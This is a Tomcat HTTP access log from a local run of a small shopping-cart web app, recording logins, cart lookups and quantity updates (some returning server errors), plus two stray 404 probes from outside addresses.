0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:39 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:45 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:46 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:46 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:47 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:51 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:51 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:51 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:41 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:41 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 41
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:42 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 785
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:42 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:45 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:50 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:52 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 33
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:56 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=1 HTTP/1.1" 302 - http-bio-8080-exec-5 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:56 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:16:56 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 27
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:17:36 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=6 HTTP/1.1" 302 - http-bio-8080-exec-1 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:17:36 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-1 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:17:36 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:30 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:30 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 49
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:31 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 710
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:33 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:37 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:38 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 31
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:42 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 36
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:52 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-4 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-4 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:18:52 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 25
64.62.197.132 - - [20/Nov/2022:21:19:45 +0800] "GET /?format=json HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:22:27 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:22:27 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-5 72
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:22:28 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-6 534
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:22:55 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-8 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:23:01 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:23:02 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-2 33
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:23:03 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-5 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:23:03 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:25:59 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-7 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:25:59 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-7 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:25:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-7 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:29:15 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=7 HTTP/1.1" 302 - http-bio-8080-exec-2 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:29:15 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-2 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:29:15 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-2 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:08 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:08 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 48
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:09 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 924
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:11 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:17 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:30 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 29
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:36:34 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 500 13106 http-bio-8080-exec-10 21
185.216.140.186 - - [20/Nov/2022:21:43:18 +0800] "GET /cache/global/img/gs.gif HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:01 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:01 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 33
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:01 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 491
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:03 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:09 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:10 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:12 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:12 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:55:15 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=5 HTTP/1.1" 500 13106 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:57:42 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:57:42 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 33
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:57:42 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 498
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:57:47 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:57:52 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:59:21 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 39
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:59:22 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:21:59:23 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:22:02:28 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 500 13106 http-bio-8080-exec-4 25
